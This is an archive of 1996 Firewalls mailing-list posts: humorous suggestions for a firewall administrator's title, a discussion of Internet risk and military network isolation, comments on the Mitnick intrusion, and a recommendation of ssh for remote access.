Perhaps you know my friends, Boris and Natashia? (Boris is the one w/ the
pointy hat, and Natashia is the one that looks like Morticia Addams).

Well, at least SOMEONE on the list has a sense of humor too!

Brain21

From firewalls-owner Fri Jan 12 10:59:16 1996
Date: Fri, 12 Jan 1996 13:39:07 -0500 (EST)
From: "A. Padgett Peterson, P.E. Information Security"
To: firewalls@greatcircle.com
Message-Id: <960112133907.20203704@hobbes.orl.mmc.com>
Subject: re: "Q" Clearance

> I hold a TS SCI clearance with the Air Force. I've been in for almost 10
> years, and I've never heard of a "Q" clearance.

Ten years ago is too recent. Back in the days of free trips to Southeast Asia
there were several compartmented levels above Top Secret such as "R" and
"Crypto" that usually required EBIs. "Q" referred to certain "special
weapons" that I will not go into further.

Does Brain21's father glow in the dark ?
Warmly, Padgett

From firewalls-owner Fri Jan 12 11:06:22 1996
Date: Fri, 12 Jan 1996 12:01:26 -0500 (EST)
From: "Paul D. Robertson"
To: Danny Cox
cc: firewalls@GreatCircle.COM
Subject: Re: Insecurity of Internet connections
In-Reply-To: <9256.9601121010@gmap.leeds.ac.uk>

On Fri, 12 Jan 1996, Danny Cox wrote:

> And thus spake Benjamin Allan Smith :
>
> This left me musing. The overall purpose of building firewalls between our
> internal networks and the Internet (or any other network) is to secure
> ourselves from compromise as best we can. There is a lot of twitchiness
> around about allowing Internet connections and I suspect that's in part
> simply driven by the media, who pick up cheerfully on stories of
> successfully compromised systems whether due to poor administration or bad
> initial configuration or weak security software or whatever.
>
> What I'm trying to get a feel for, and I'm struggling a little, is to what
> extent we can secure ourselves in the ideal world. When I hear people say
> that the Internet is insecure, and connecting to the Internet is an
> enormous security risk, I squirm. If, as an absolute statement, those are
> true, then maybe we're wasting time here anyway. Assuming it's not, then
> what level of assurance can we offer to a non-techie sort of person. Does
> anyone have numbers to indicate what attacks are successful - a sort of
> top ten if you would?
>

The Internet is insecure in many ways. I'd venture to guess that each of us
has a little different view of security, and risk. The risks are many, and
varied. The risks are in many cases similar to allowing other things:

Desktop modems
Diskettes from unknown sources
People to enter the building unauthenticated
Complete trust of vendors and/or contractors (Security trust, not social trust)

If you let things go into, and come out of your network, then you're
vulnerable, at some level or other. It may take compromise of an internal
machine, or a trojaned binary that does encapsulation, but that's why you
have multiple layers of security, and why network security doesn't preclude
host security.

'Enormous' really depends on what's on your network, and what inherent
protections that 'what' has on it. If your company financials are sitting on
a Solaris box, a release back, with no patches, and you've got enemies, then
it's a little different than if they're on an AS/400 with only SNA access,
and session level encryption with say MAC authentication over a switched
network.

IMO Security is never a waste of time, even if it isn't absolute. However
the amount of time you've put into your risk analysis, and keeping it up to
date are a good indication of what that time is worth.

Threat analysis is a different animal than risk analysis. With the
possibility of being outspoken, and probably flamed, I'd say that until
you've done a thorough and professional risk analysis, doing threat analysis
is premature. It also doesn't work in a general sense. Looking at numbers of
successful attacks is a crapshoot, beyond ensuring that you're not
vulnerable to the well-known attacks. If you're in a business like my
company's, where you can piss off several hundred thousand people a day, the
number of successful attacks by unmotivated kids experimenting doesn't have
the same weight as number and type of successful attacks by pissed off
people. Though I'm sure type of attack is significant, numbers just don't
mean much, as all you need is one.

> When the military refuse connections to the Internet - are they absolutely
> right because the Internet is insecure, or simply covering their backs
> (understandably) in case of something going amiss, which isn't known about
> currently ? They must achieve some sort of risk analysis in order to decide
> what's underlying network topology is okay and what isn't, I assume. Anyone
> give some insight as to how this is done ?
>

Sure, it's deny everything, and allow only what you absolutely *have* to,
after verifying that it looks safe. I find it to be a good philosophy in
general. The proof, of course is in how you verify that something looks
safe. In the case of governments, you spend quite a large sum of money with
experts in many fields, from particle physicists up the tree. In a
commercial environment, you tend to do what you can with what you know, or
have connections or a budget for, put more faith in vendors, test their
assertions anyhow, and disallow anything you can't or don't understand.

The military's distrust of public networks, such as phone systems, the
Internet, etc., comes from the fact that if certain information is
compromised lots of people potentially die. Given the risk, their posture is
quite correct.

> I don't feel that my words ask my question very precisely, but hopefully
> they might allow a bit of reading between lines to show what I'm getting at!

Assurance is not easy to quantify. Especially given the level of trust which
non-technical people place in information and programs from anonymous
sources (let alone vendors). The Good Times virus being an excellent case in
point. But then, we're *supposed* to be paranoid, and our model of an ideal
world is so far out from reality that it's not approachable.

Paul.
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
PSB#9280

From firewalls-owner Fri Jan 12 11:15:02 1996
From: davek@melupl.melita.com (Dave Kennedy)
Message-Id: <9601121905.AA43800@melupl.melita.com>
Subject: Re: "Title for Firewall Admin?
To: shawn@aob.org (Shawn Steele)
Date: Fri, 12 Jan 1996 14:05:12 -0500 (EST)
Cc: Firewalls@GreatCircle.COM
In-Reply-To: <9601121030.ZM24307@aob.org> from "Shawn Steele" at Jan 12, 96 10:30:29 am
Reply-To: davek@melita.com (Dave Kennedy)

> The mail administrator is "postmaster"
> The web server admin is "webmaster"
> Is there such a title for a firewall administrator?

keymaster

Remember "Ghostbusters?" There was the gatekeeper and the keymaster.
--
| Dave Kennedy (davek@melita.com)   Voice: 770-409-4575 |

From firewalls-owner Fri Jan 12 11:44:16 1996
From: "Tim Crisall"
Organization: Grant MacEwan Community College
To: firewalls@GreatCircle.COM
Date: Fri, 12 Jan 1996 12:18:32 MST
Subject: Re: "Title for Firewall Admin?

> The mail administrator is "postmaster"
> The web server admin is "webmaster"
> Is there such a title for a firewall administrator?
> And is there a list of these colorful "nom de nets" anywhere?

Guardian Of Data

_ _ _
Tim Crisall
Grant MacEwan Community College

From firewalls-owner Fri Jan 12 11:50:48 1996
From: jgt10@amdahl.com (John G. Thompson)
Subject: Re: "Title for Firewall Admin?
To: avolio@trusted.com (Frederick M Avolio)
Date: Fri, 12 Jan 1996 10:45:31 -0800 (PST)
Cc: billcurr@cyberspace.com, firewalls@GreatCircle.COM
In-Reply-To: <2.2.16.19960112143121.3f9720e2@gauntlet-1.trusted.com> from "Frederick M Avolio" at Jan 12, 96 09:31:21 am

> But I can see, eventually, a need for a well known different term.
>
> Gee, another thing for the Firewall Product Developers Consortium to talk
> about. :-)

Quick... get famous. Suggest a standard!

> "gatekeeper" is a fun possibility. "doorman" is too plain.

Well, the obvious follow-on (particularly with the RealAudio reference) is...

"Doormat".

JGT
--
John G. Thompson   jgt10@amdahl.com   1-408-992-2088
Amdahl Corporation, P.O. Box 3470 MS 383, Sunnyvale, CA 94088-3470
[The opinions expressed are MINE. They do not necessarily reflect the
policies, procedures, press releases or opinions of the Amdahl Corporation.]
From firewalls-owner Fri Jan 12 11:59:17 1996
Date: Fri, 12 Jan 1996 13:51:37 -0600 (CST)
From: Ron DuFresne
To: Bob Resino
cc: firewalls@GreatCircle.COM
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (
In-Reply-To: <199601121628.KAA23450@icicle>

On Fri, 12 Jan 1996, Bob Resino wrote:

> > Date: Thu, 11 Jan 1996 11:50:54 -0600 (CST)
> > From: Ron DuFresne
> > To: Brain21
> > Cc: Doug Hughes , firewalls@GreatCircle.COM
> > Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting)
> >
> > SNIP
> >
> > Agreed, either we have here an extreme case of over-confidence,
> > misconfiguring by others really doing the security, or good old Mitnick
> > was 'invited' in a case bordering on entrapment. Seems very strange in
> > either way, seems strange if not an outright blunder.
> >
> > Later,
> >
> > Ron Dufresne
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > "Cutting the space budget really restores my faith in humanity. It
> > eliminates dreams, goals, and ideals and lets us get straight to the
> > business of hate, debauchery, and self-annihilation." -- Johnny Hart
> > ***testing, only testing, and damn good at it too!***
> >
> > OK, so you're a Ph.D. Just don't touch anything.
> >
>
> Ron,
> In some states, there is no such thing as "Entrapment". Such is the
> case in the Commonwealth of Virginia. One simple warning screen like
> the CERT P.L. 98-473 warning would preclude any claim of entrapment.
>

Bob,

I can understand this in a purely legal sense, yet, the fact that T. S. had
tools on a home system connected to his place of employ, with the BSD 'r'
utils enabled would lead one to think of this, in less than legal terms as
an *invite*. And if there was some 'reason' for leaving this system open,
such as to 'discover' who might be 'doorknob twisting' or entering, in a
sense, this was a setup, and thus, entrapment.

Course, legally, are you implying that an officer of the law can go about in
Virginia and solicit illegal activities of felons at will? Sounds like a
whole new, or would it be old archaic? legal system you folks have there if
this is so...

Later,

Ron Dufresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.
From firewalls-owner Fri Jan 12 12:06:10 1996
Date: Fri, 12 Jan 1996 13:15:53 -0500
From: Chris Eastman
Subject: tracking mitnick
To: firewalls@greatcircle.com

Tracing Mitnick back to his original destination would be rather trivial
regardless of the hosts he bounced through.

Wonder what those unknown connections to MAE-east are... :)

--chris

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Christopher Eastman     %% Cable & Wireless, Inc   %%
%% MDS Network Engineer    %% 1919 Gallows Road       %%
%% chris@cwi.net           %% Vienna, VA 22182        %%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

From firewalls-owner Fri Jan 12 12:15:02 1996
From: jgt10@amdahl.com (John G. Thompson)
Subject: Re: "Title for Firewall Admin?
To: billcurr@cyberspace.com (Bill Curr)
Date: Fri, 12 Jan 1996 10:09:58 -0800 (PST)
Cc: firewalls@greatcircle.com
In-Reply-To: from "Bill Curr" at Jan 11, 96 04:04:55 pm

> The mail administrator is "postmaster"
> The web server admin is "webmaster"
> Is there such a title for a firewall administrator?
> And is there a list of these colorful "nom de nets" anywhere?

Not that I know of, but I'm agitating for...

'Internet Access Engineer'

Which sounds a lot better than what I really am...

JOAT(MON) Jack Of All Trades (Master Of None).

JGT
--
John G. Thompson   jgt10@amdahl.com   1-408-992-2088
Amdahl Corporation, P.O. Box 3470 MS 383, Sunnyvale, CA 94088-3470
[The opinions expressed are MINE. They do not necessarily reflect the
policies, procedures, press releases or opinions of the Amdahl Corporation.]

From firewalls-owner Fri Jan 12 12:28:11 1996
From: cjc@novell.com (Chris Calabrese)
To: firewalls@GreatCircle.COM
Date: Fri, 12 Jan 1996 13:13 EST
Subject: Re: Insecurity of Internet connections
Message-ID: <30f6ab820.278b@chimaera.summit.novell.com>

> From: dannyc@gmap.leeds.ac.uk (Danny Cox)
> Date: Fri, 12 Jan 1996 10:10:16 GMT
> Message-ID: <9256.9601121010@gmap.leeds.ac.uk>
>
> [...]
> The overall purpose of building firewalls between our
> internal networks and the Internet (or any other network)
> is to secure ourselves from compromise as best we can.
> There is a lot of twitchiness around about allowing Internet
> connections and I suspect that's in part simply driven by the
> media [...]
>
> When I hear people say that the Internet is insecure,
> and connecting to the Internet is an enormous security risk,
> I squirm.

To say that "the Internet is insecure" is meaningless since "the Internet"
is merely a connection of routers and wires. A more reasonable statement is
"I don't trust the security of the software on my computers enough to allow
anyone in the known universe to send them data across the Internet."

For the military, the statement is "I don't trust the security of the
software on my firewall enough to allow anyone in the known universe to send
data to my computer with top-secret data that could alter the course of the
world." Given that very few items of software/hardware in the world have been
proven correct (yes, there are some), this seems a reasonable statement.

In fact, it's not just the Internet they don't trust. The really really
really top secret computers are in bunker-like rooms with guards with big
guns at the doors and no wires going outside the rooms other than power lines
(which are heavily filtered to make sure it's only power that's going
across). In turn, the rooms are in bunker-like buildings with guards at the
doors, and they're on military campuses (campi, actually) with fences and
guards at the gates. For practical reasons, some of these computers may be
networked (like if they control missile launches at bases 1,000 miles away),
but then the wires are run through physically secure routes (except for the
links to ships, obviously), heavy encryption is used (with key-exchange done
by pieces of paper in a briefcase), etc, etc.

For computers whose loss of data or leakage of data can't alter the fate of
the world (and certain computers at certain financial institutions may not
fall into this category), an Internet connection (and the equipment that goes
along with it) installed and administered by skilled professionals lowers the
risks substantially. The question is whether the users of the computers get
enough benefits to justify the remaining risks and the cost. For most
educational institutions and businesses, especially those in the computer
industry where customers expect to be able to download patches from the net,
get support via e-mail, etc, etc, the answer is clearly yes. As costs come
down, firewalls become more secure, and there are more and more benefits to
being on the net, the answer is becoming yes in more and more cases.

--
Christopher J. Calabrese
Network Security Architect
Novell IS&T Security Services Group, Florham Park, NJ
cjc@novell.com

From firewalls-owner Fri Jan 12 12:29:17 1996
From: syadasti@iag.net (Mike Gogulski)
Subject: Re: "Title for Firewall Admin?
To: firewalls@greatcircle.com
Date: Fri, 12 Jan 1996 14:30:48 -0500 (EST)

Frederick M Avolio wrote:
>
> "gatekeeper" is a fun possibility. "doorman" is too plain.
>

Ah, then we'll have to call hackers "keymasters" in keeping with the
Ghostbusters theme...

Peace,
Mike
--
Mike Gogulski              syadasti@iag.net
Network Administrator      syadasti@cat.net, syadasti@pobox.com
Internet Access Group      Altamonte Springs, Florida, USA
+1-407-786-1145 Work       +1-407-672-2340 Other

From firewalls-owner Fri Jan 12 12:44:17 1996
From: Kent Landfield
Message-Id: <199601122007.AA21580@ns1.sterling.com>
Subject: Re: "Title for Firewall Admin?
To: CRISALLT@ADMIN.GMCC.AB.CA (Tim Crisall)
Date: Fri, 12 Jan 96 14:07:46 CST
Cc: firewalls@GreatCircle.COM
In-Reply-To: ; from "Tim Crisall" at Jan 12, 96 12:18 pm

>
> > The mail administrator is "postmaster"
> > The web server admin is "webmaster"
> > Is there such a title for a firewall administrator?
> > And is there a list of these colorful "nom de nets" anywhere?
>
> Guardian Of Data

Doormat seems more appropriate. ;-)

--
Kent Landfield                  INTERNET: kent_landfield@sterling.com
Director, Internet Services     UUCP: uunet!kent || sparky!kent
Sterling Software               FAX: 1-214-891-8655
Phone: 1-214-891-8693           Pager: 1-800-386-0277
Please send comp.sources.misc-related mail to kent@uunet.uu.net.

From firewalls-owner Fri Jan 12 12:59:17 1996
From: "Marcus J. Ranum"
Message-Id: <199601122055.PAA05123@clark.net>
Subject: Re: Firewalls-Digest V5 #23
To: Firewalls@GreatCircle.COM
Date: Fri, 12 Jan 1996 15:55:57 -0500 (EST)
Cc: firewalls-digest@GreatCircle.COM
In-Reply-To: <199601121809.KAA24839@miles.greatcircle.com> from "firewalls-digest-owner@uunet.uu.net" at Jan 12, 96 10:09:53 am
Reply-To: mjr@v-one.com
Organization: V-One Corporation, Baltimore, MD

Brian Boyle writes one of the great profound rules of system design:

> If you don't know what the objective is, it is pretty hard to design a system
> to help you get there.

If you don't know what the objective is, then you'll never know if you've
accomplished it.

If you follow the 2 rules of system design, you are able to derive tests to
determine if the thing works the way it's supposed to. These concepts are the
central idea behind the orange book. In practice, though, the implementation
details drowned out the intent.

mjr.
From firewalls-owner Fri Jan 12 12:59:33 1996
Date: Fri, 12 Jan 1996 14:54:44 -0500 (EST)
From: "Bryan D. Boyle"
Subject: Re: "Title for Firewall Admin?
To: Shawn Steele
Cc: Firewalls@greatcircle.com
In-Reply-To: <9601121030.ZM24307@aob.org>

having been a 'wall admin since early '92, 'Hal' is my choice.

Hal?

Yeah. Remember that Far Side cartoon with the two deer standing in the
forest, one of them has a bull's eye on his chest, and the other one says to
him "Bummer of a birthmark, Hal". ;)

Bryan D. Boyle | EMAIL: bdboyle@erenj.com 908-730-3338
#include       | http://www.access.digex.net/~bdboyle/index.html
"It is only the ignorant who suppose themselves omniscient."
--General Robert Edward Lee--

On Fri, 12 Jan 1996, Shawn Steele wrote:

> > The mail administrator is "postmaster"
> > The web server admin is "webmaster"
> > Is there such a title for a firewall administrator?
>
> Firemaster?
>
>

From firewalls-owner Fri Jan 12 13:14:20 1996
Date: Fri, 12 Jan 1996 15:05:49 -0600 (CST)
From: Ron DuFresne
To: Chris Eastman
cc: firewalls@GreatCircle.COM
Subject: Re: tracking mitnick

On Fri, 12 Jan 1996, Chris Eastman wrote:

> Tracing Mitnick back to his original destination would be rather trivial
> regardless of the hosts he bounced through.
>
> Wonder what those unknown connections to MAE-east are... :)
>

Actually, if you're at all familiar with the story, such ease proved not to
be the case...

Later,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.
From firewalls-owner Fri Jan 12 13:21:08 1996
From: Ken Hays
Date: Fri, 12 Jan 1996 14:33:44 -0500
Message-Id: <9601121933.AA26551@margit>
To: davek@melita.melita.com (Dave Kennedy)
Cc: shawn@aob.org (Shawn Steele), Firewalls@GreatCircle.COM
In-Reply-To: <9601121905.AA43800@melupl.melita.com>
Subject: Re: "Title for Firewall Admin?
Reply-To: Ken Hays

Dave Kennedy wrote on 12-Jan-96 at 14:05:12 -0500, in part:

>> The mail administrator is "postmaster"
>> The web server admin is "webmaster"
>> Is there such a title for a firewall administrator?
>
>keymaster
>
>Remember "Ghostbusters?" There was the gatekeeper and the keymaster.

I would suggest that keymaster be reserved for the Kerberos administrator.

Later,
Ken
---------------------------------------------------------------------------
Kenneth M. Hays, Assistant Director               hays@scri.fsu.edu
Supercomputer Computations Research Institute     aka kmh8 at the NIC
Florida State University                          voice=904-644-7053
400 Dirac Science Center Library                  fax=904-644-0098
Tallahassee, Florida 32306-4052
----------------------------------------------------------------------------

From firewalls-owner Fri Jan 12 13:29:19 1996
From: "Marcus J. Ranum"
Message-Id: <199601122110.QAA08619@clark.net>
Subject: Re: "Title for Firewall Admin?
To: Firewalls@GreatCircle.COM
Date: Fri, 12 Jan 1996 16:10:37 -0500 (EST)
In-Reply-To: <199601121809.KAA24839@miles.greatcircle.com> from "firewalls-digest-owner@uunet.uu.net" at Jan 12, 96 10:09:53 am
Reply-To: mjr@v-one.com
Organization: V-One Corporation, Baltimore, MD

I think most firewall admins are known by the title:

"Is the Web down?"

But that's probably a bit too long for a business card.

[I'm "Chief Scientist" but that's only because "Vice President of RTFM" was
too long and too informal. :) ]

mjr.
From firewalls-owner Fri Jan 12 13:44:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA04347 for firewalls-outgoing; Fri, 12 Jan 1996 13:31:52 -0800 (PST) Received: from ns.ncsa.com (ns.ncsa.com [205.160.199.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA04335 for ; Fri, 12 Jan 1996 13:31:44 -0800 (PST) Received: (from topher@localhost) by ns.ncsa.com (8.6.12/8.6.9) id QAA00696 for firewalls@greatcircle.com; Fri, 12 Jan 1996 16:38:49 -0500 From: topher Message-Id: <199601122138.QAA00696@ns.ncsa.com> Subject: Re: "Title for Firewall Admin? To: firewalls@greatcircle.com Date: Fri, 12 Jan 1996 16:38:48 -0500 (EST) In-Reply-To: from "John G. Thompson" at Jan 12, 96 10:09:58 am X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> The mail administrator is "postmaster"
> The web server admin is "webmaster"

Personally, I'm pushing for 'Smokey', like the bear, or the cop...
=-)

From firewalls-owner Fri Jan 12 13:48:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA00536 for firewalls-outgoing; Fri, 12 Jan 1996 12:25:16 -0800 (PST) Received: from theory.tc.cornell.edu (THEORY.TC.CORNELL.EDU [132.236.98.174]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA00522 for ; Fri, 12 Jan 1996 12:25:10 -0800 (PST) Received: (from uactech@localhost) by theory.tc.cornell.edu (8.6.9/8.6.6) id PAA34460 for firewalls@Greatcircle.com; Fri, 12 Jan 1996 15:24:16 -0500 Received: from ovid by ithaca.actech.com (920330.SGI/SMI-4.0) id AA24955; Fri, 12 Jan 96 13:47:46 -0500 Received: by ovid.actech.com (5.x/SMI-SVR4) id AA03127; Fri, 12 Jan 1996 13:47:46 -0500 Received: from Messages.8.5.N.CUILIB.3.45.SNAP.NOT.LINKED.ovid.sun4.51 via MS.5.6.ovid.sun4_51; Fri, 12 Jan 1996 13:47:46 -0500 (EST) Message-Id: <4kxenGP6_EEC1UGPg0@ovid> Date: Fri, 12 Jan 1996 13:47:46 -0500 (EST) From: Steve Gaarder To: firewalls@Greatcircle.com Subject: Re: Encryption export laws from US... In-Reply-To: <30F54634@at3038p.kc.bv.com> References: <30F54634@at3038p.kc.bv.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Excerpts from lists.firewalls: 11-Jan-96 Re: Encryption export laws .. "Archer, Barry J."@bv.co (1155)

> One of the major can'o'worms I face is how to set up secure USER to
> Firewall sessions over the Internet. It's not a matter of whether or not I
> like it, it's coming.
> Firewall to Firewall encryption is great, but when you have nomadic
> remote users and small international offices individual access gets
> important for a lot of folks.

The ssh program (http://www.cs.hut.fi/ssh) is a very promising candidate in this area. It's a replacement for rsh that adds encryption, cryptographic authentication, and X11 and TCP port forwarding. It's pretty cute, and has the added plus of having been developed outside the US. You can tunnel it through a firewall with plug-gw or Socks.
I'm designing a setup based on it. However, you have to look at the security of your nomadic user's machine. If a user on that machine can use ssh to get past your firewall, and that machine gets compromised, you come under attack. This will get particularly interesting once the MS Windows ssh client is available - I hope I can get away with insisting on Windows NT. Steven Gaarder Network and Systems Administrator gaarder@actech.com A C Technology, Ithaca, N.Y., USA From firewalls-owner Fri Jan 12 13:59:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA05747 for firewalls-outgoing; Fri, 12 Jan 1996 13:53:04 -0800 (PST) Received: from delta.eecs.nwu.edu (delta.eecs.nwu.edu [129.105.5.103]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA05742 for ; Fri, 12 Jan 1996 13:52:55 -0800 (PST) Received: by delta.eecs.nwu.edu (8.6.12/8.6.12) id PAA22056 for firewalls@greatcircle.com; Fri, 12 Jan 1996 15:51:57 -0600 Date: Fri, 12 Jan 1996 15:51:57 -0600 From: Robert Bonomi Message-Id: <199601122151.PAA22056@delta.eecs.nwu.edu> To: firewalls@greatcircle.com Subject: Re: "Title for Firewall Admin? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk + Date: Fri, 12 Jan 1996 09:31:21 -0500 + From: Frederick M Avolio + Subject: Re: "Title for Firewall Admin? + Sender: firewalls-owner@GreatCircle.COM + Precedence: bulk + Status: R + + On the Gauntlet Firewalls that we install, the management accounts of the + firewall machine go to the firewall manager. + + But I can see, eventually, a need for a well known different term. + + Gee, another thing for the Firewall Product Developers Consortium to talk + about. :-) Quick... get famous. Suggest a standard! + + "gatekeeper" is a fun possibility. "doorman" is too plain. how about 'cerberus' -- he who guards the gateway to Hell. or, my personal favorite, 'horatio'. He stood at the _bridge_, keeping the barbarians at bay. 
*grin* Brent's suggestion had a strong factual basis in its favor, however. :((

+
+ Fred
+
+ At 04:04 PM 1/11/96 -0800, Bill Curr wrote:
+ >
+ >The mail administrator is "postmaster"
+ >The web server admin is "webmaster"
+ >Is there such a title for a firewall administrator?
+ >And is there a list of these colorful "nom de nets" anywhere?

Postmaster -- mail admin
webmaster -- www admin
hostmaster -- DNS admin

+ >-Thanks
+ >Bill
+ >
+ >

From firewalls-owner Fri Jan 12 14:08:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA26992 for firewalls-outgoing; Fri, 12 Jan 1996 11:24:15 -0800 (PST) Received: from mailx.best.com (mailx.best.com [204.156.128.56]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA26970 for ; Fri, 12 Jan 1996 11:24:06 -0800 (PST) Received: from shellx.best.com (shellx.best.com [206.86.0.11]) by mailx.best.com (950911.SGI.8.6.12.PATCH825/8.6.5) with ESMTP id TAA14094 for ; Fri, 12 Jan 1996 19:25:16 GMT Received: from yobie.vip.best.com (yobie.vip.best.com [204.156.155.53]) by shellx.best.com (950911.SGI.8.6.12.PATCH825/8.6.5) with SMTP id LAA03993 for ; Fri, 12 Jan 1996 11:23:09 -0800 Message-ID: <30F5633B.619B@yobie.com> Date: Thu, 11 Jan 1996 11:21:31 -0800 From: Yobie Benjamin Organization: MetaGenesis, INc. X-Mailer: Mozilla 2.0b5 (Win95; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: Re: "Title for Firewall Admin? References: <2.2.16.19960112143121.3f9720e2@gauntlet-1.trusted.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

How about concierge du net? 8-)

Frederick M Avolio wrote:
>
> On the Gauntlet Firewalls that we install, the management accounts of the
> firewall machine go to the firewall manager.
>
> But I can see, eventually, a need for a well known different term.
>
> Gee, another thing for the Firewall Product Developers Consortium to talk
> about. :-) Quick...
get famous. Suggest a standard! > > "gatekeeper" is a fun possibility. "doorman" is too plain. > > Fred > > At 04:04 PM 1/11/96 -0800, Bill Curr wrote: > > > >The mail administrator is "postmaster" > >The web server admin is "webmaster" > >Is there such a title for a firewall administrator? > >And is there a list of these colorful "nom de nets" anywhere? > >-Thanks > >Bill > > > > -- Yobie Benjamin yobie@yobie.com 102262.2260@compuserve.com yobie@best.com -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQINAzBWg18AAAEQANnXKRohQlsdi+E2pVGH9/0ljIJFwg6TCQQ37Lcv8LfIR1RP FbwXDfMAWtRKQkYtHUa18png/qMlDJeaethHDaotRMuhUtDpvWxLH7HmWyJ6sz78 ZHN3/ddtLrzrb+fYgjXhBnkSckmxwNQ8o1k4E45UvWGL2BzldVeOKmmBHjI8hgxX lgPAw+Ozl2JESYvRjj3OT1jHFGlri/Hzvd/D7kbkhF6eMcCotX1h6ZcoTUka5qqh PzKr04zCzQrw0z/Qy5St1gA2gB40mwsxICnrLo7y0fXilFT0qtQI+bj2pV2rfPhe KQYXLHuL3Hrv8vUhciPtNrS3iPESTsIeADZ3r+0g6RJ1XDkZ1P9iaM4S6TRjugw1 CmBaj9rpkJ79MV235n3a0q6ZlWMzhPJ5yz+kt2UdBMeeWXT5eV+AB0tfgYUt9Mss G8/h+m8FypdxKlEs/9e3PtROmoIm2OXKUEFzY9Cl6Ew0nisCXyPYtuRRrC7w6EWR oj5WItiIdZvbN9GmTJ5seBA2TwAxKcDw7LEieaItCcUsG955jbagOaptBOPSUrv8 LJA40PIPgXpXP+SEJiL9wJQ5TGvkAsZkw+X9z26c9chImPy5A7qCZy3R/XZYu0Hc OCd2zQnjzw87LKfIhJ3LDHMZADBdLvVdFfCd4EihjldGdzGzoQJ1FGhpIpSRAAUT tCBZb2JpZSBCZW5qYW1pbiA8eW9iaWVAeW9iaWUuY29tPg== =9HBa -----END PGP PUBLIC KEY BLOCK----- From firewalls-owner Fri Jan 12 14:14:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA05612 for firewalls-outgoing; Fri, 12 Jan 1996 13:50:06 -0800 (PST) Received: from gw1.octel.com (gw1.octel.com [148.147.1.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA05577 for ; Fri, 12 Jan 1996 13:49:43 -0800 (PST) Received: (from daemon@localhost) by gw1.octel.com (8.6.10/8.6.12) id NAA24118; Fri, 12 Jan 1996 13:48:41 -0800 Received: from curly.eng.octel.com(148.147.200.26) by gw1.octel.com via smap (V1.3) id sma024100; Fri Jan 12 13:48:23 1996 Received: from nts-hbo (nts-hbo.corp.octel.com [148.147.58.8]) by 
curly.eng.octel.com (8.6.12/8.6.12) with SMTP id NAA05841; Fri, 12 Jan 1996 13:48:23 -0800 Message-ID: <30F6D6E1.5EA0@octel.com> Date: Fri, 12 Jan 1996 13:47:13 -0800 From: Howard Owen Organization: Octel Communications Corporation X-Mailer: Mozilla 2.0b5 (WinNT; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM CC: Mike Gogulski Subject: Re: "Title for Firewall Admin? References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Mike Gogulski wrote:
>
> Frederick M Avolio wrote:
> >
> > "gatekeeper" is a fun possibility. "doorman" is too plain.
> >
>
> Ah, then we'll have to call hackers "keymasters" in keeping with the
> Ghostbusters theme...

No, that sounds too much like a krypto key keeper. I like "gatekeeper". It's got some history behind it. Or, we could borrow from the NSA and go with "dockmaster".

I also like "scapegoat". More along that line:

    Real World          PC Version
    Roadblock           Conveyance Check
    Fall Guy            Fall Person
    Whipping Boy        Self-esteem Enhanced Juvenile

Characteristics of a gatekeeper:

    Paranoid            Caring
    Obsessive           Detail Oriented
    Anally Retentive    Differently Excreting

Have a really nice day. 8-)

-- Howard Owen hbo@octel.com Octel Communications Corporation 1024/DC671C31 = Internet Guy/Webmaster 1001 Murphy Ranch Rd. 37 A0 46 EE BE 408-324-6576 Voice and FAX Milpitas CA 95035-7912 95 DB 92 E8 39 I am not a pay TV service!
http://www.egbok.com/hbo.html 80 89 A9 F9 3D FB

